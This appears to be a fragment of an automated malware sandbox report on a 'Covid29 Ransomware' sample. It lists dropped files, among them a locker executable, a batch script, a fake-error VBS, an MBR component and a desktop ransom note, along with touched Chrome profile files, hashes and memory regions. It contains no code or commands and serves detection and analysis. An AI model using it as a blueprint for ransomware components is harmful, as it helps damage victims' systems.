                                                                        SHA1

                                                                        1b82120b17a77b19821a759a625a6c70bf0f45fa

                                                                        SHA256

                                                                        5d3c3a53735ff2a4cc564975436f083895d727abcf8a58385c4d56ac7160741a

                                                                        SHA512

                                                                        2e085101a8da6a5327b6de725408f9895919f8343a3d9b6e66b09c4df25882fbba8dfdea3343000bcc5318125c1889c8ef3363b84771042de16774f0378dceb6

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                        Filesize

                                                                        256KB

                                                                        MD5

                                                                        612065235958739ffe7eee1a61e5f49c

                                                                        SHA1

                                                                        8a87e262b3c36e6f48094c5dfd4b299ec44bdb67

                                                                        SHA256

                                                                        d14f3a2b8811a6361bd8b2f3784653c9da05aa9832ccda35f422462182c13525

                                                                        SHA512

                                                                        bcb4d673419721080d3916791fc202da586fd40d19917310d410ba9eee32bdee27bb2f4f37829d065eb599fab1044676665a82382a9afa6fa78fd9029c1898ed

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                        Filesize

                                                                        256KB

                                                                        MD5

                                                                        0e6aafc364cc89f81bbd90bd5f32602c

                                                                        SHA1

                                                                        90a8e5325134f8b28dbd7ca68c1bc60a5175eacf

                                                                        SHA256

                                                                        e2400ba1c43c6f595536a630e5b9125a865a4341f0c8c7989ac9cabfa35b8ffa

                                                                        SHA512

                                                                        e8eb7f97a84763783207992d918f859c0021c3f807eea588bce8536863f57f4aef81622977975326396e402c6032b4e9886dd9a89f921bd143951d616bee53a9

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

                                                                        Filesize

                                                                        90KB

                                                                        MD5

                                                                        3159b91a7a70c1d3d0de9ce26885427c

                                                                        SHA1

                                                                        17f96efcf5a206fdd3252d544e3f4a613d3ba043

                                                                        SHA256

                                                                        5faaf42c45e8150582abb8e6a6a5879741b08196137e68fc2336d7556d844d6e

                                                                        SHA512

                                                                        539c7a021a007409f0c4e0d6b0359ec28f1325e33b538abd0e68ede70693ca88e08bb7a7ba53fc718564196658183025d53715cafdd7c2bfa21bc8eaa872a0a5

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

                                                                        Filesize

                                                                        97KB

                                                                        MD5

                                                                        d3fff536302c54e2b5073a08c6c88cb9

                                                                        SHA1

                                                                        e08877aa3e32d7053caf3a6edb156a3362357753

                                                                        SHA256

                                                                        5c862487ccca908236e0a0d84d312830b71e90186859a7ff5075b2e9b753b962

                                                                        SHA512

                                                                        2fa860cd41a0dc8233ae38a71528b451b271bff425d4fdd2294993b28ea98857b6184796d536bbeae2ad1ff24f4c0b365ced2b01ee7d120ba53d8a83935590d6

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe59f2a3.TMP

                                                                        Filesize

                                                                        89KB

                                                                        MD5

                                                                        bf1030d63824135c5331b4d145f73ad2

                                                                        SHA1

                                                                        eafd98807a8c9beebcff381d85713ba448e818e0

                                                                        SHA256

                                                                        7a1dfcce013358980b20b9970e9e1c3b99dbf6b7d8110533739c539c0bca4031

                                                                        SHA512

                                                                        1885d545e588125a84350ffb7a478171cec8a3515fa4dfb47e863c6cb16f6ce43a97ead304f5602f6c1e013178380584e3fcb2987141f8afabfb2193808fd8c9

                                                                      • C:\Users\Admin\AppData\Local\Temp\6C4E.tmp\Cov29Cry.exe

                                                                        Filesize

                                                                        103KB

                                                                        MD5

                                                                        8bcd083e16af6c15e14520d5a0bd7e6a

                                                                        SHA1

                                                                        c4d2f35d1fdb295db887f31bbc9237ac9263d782

                                                                        SHA256

                                                                        b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a

                                                                        SHA512

                                                                        35999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a

                                                                      • C:\Users\Admin\AppData\Local\Temp\6C4E.tmp\Cov29LockScreen.exe

                                                                        Filesize

                                                                        48KB

                                                                        MD5

                                                                        f724c6da46dc54e6737db821f9b62d77

                                                                        SHA1

                                                                        e35d5587326c61f4d7abd75f2f0fc1251b961977

                                                                        SHA256

                                                                        6cde4a9f109ae5473703c4f5962f43024d71d2138cbd889223283e7b71e5911c

                                                                        SHA512

                                                                        6f83dd7821828771a9cae34881c611522f6b5a567f5832f9e4b9b4b59bf495f40ad78678bd86cba59d32ea8644b4aa5f052552774fea142b9d6da625b55b6afc

                                                                      • C:\Users\Admin\AppData\Local\Temp\6C4E.tmp\TrojanRansomCovid29.bat

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        57f0432c8e31d4ff4da7962db27ef4e8

                                                                        SHA1

                                                                        d5023b3123c0b7fae683588ac0480cd2731a0c5e

                                                                        SHA256

                                                                        b82e64e533789c639d8e193b78e06fc028ea227f55d7568865120be080179afc

                                                                        SHA512

                                                                        bc082486503a95f8e2ce7689d31423386a03054c5e8e20e61250ca7b7a701e98489f5932eba4837e05ec935057f18633798a10f6f84573a95fcf086ee7cabcbf

                                                                      • C:\Users\Admin\AppData\Local\Temp\6C4E.tmp\fakeerror.vbs

                                                                        Filesize

                                                                        144B

                                                                        MD5

                                                                        c0437fe3a53e181c5e904f2d13431718

                                                                        SHA1

                                                                        44f9547e7259a7fb4fe718e42e499371aa188ab6

                                                                        SHA256

                                                                        f2571f03eb9d5ee4dca29a8fec1317ded02973c5dd233d582f56cebe98544f22

                                                                        SHA512

                                                                        a6b488fc74dc69fc4227f92a06deb297d19cd54b0e07659f9c9a76ce15d1ef1d8fa4d607acdd03d30d3e2be2a0f59503e27fc95f03f3006e137fa2f92825e7e3

                                                                      • C:\Users\Admin\AppData\Local\Temp\6C4E.tmp\mbr.exe.danger

                                                                        Filesize

                                                                        1.3MB

                                                                        MD5

                                                                        35af6068d91ba1cc6ce21b461f242f94

                                                                        SHA1

                                                                        cb054789ff03aa1617a6f5741ad53e4598184ffa

                                                                        SHA256

                                                                        9ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e

                                                                        SHA512

                                                                        136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169

                                                                      • C:\Users\Admin\Desktop\covid29-is-here.txt

                                                                        Filesize

                                                                        861B

                                                                        MD5

                                                                        c53dee51c26d1d759667c25918d3ed10

                                                                        SHA1

                                                                        da194c2de15b232811ba9d43a46194d9729507f0

                                                                        SHA256

                                                                        dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52

                                                                        SHA512

                                                                        da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c

                                                                      • C:\Users\Admin\Downloads\Covid29 Ransomware.zip

                                                                        Filesize

                                                                        1.7MB

                                                                        MD5

                                                                        272d3e458250acd2ea839eb24b427ce5

                                                                        SHA1

                                                                        fae7194da5c969f2d8220ed9250aa1de7bf56609

                                                                        SHA256

                                                                        bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3

                                                                        SHA512

                                                                        d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c

                                                                      • memory/860-553-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                                        Filesize

                                                                        1.8MB

                                                                      • memory/860-444-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                                        Filesize

                                                                        1.8MB

                                                                      • memory/1412-477-0x0000000000E80000-0x0000000000EA0000-memory.dmp

                                                                        Filesize

                                                                        128KB

                                                                      • memory/3796-473-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                        Filesize

                                                                        864KB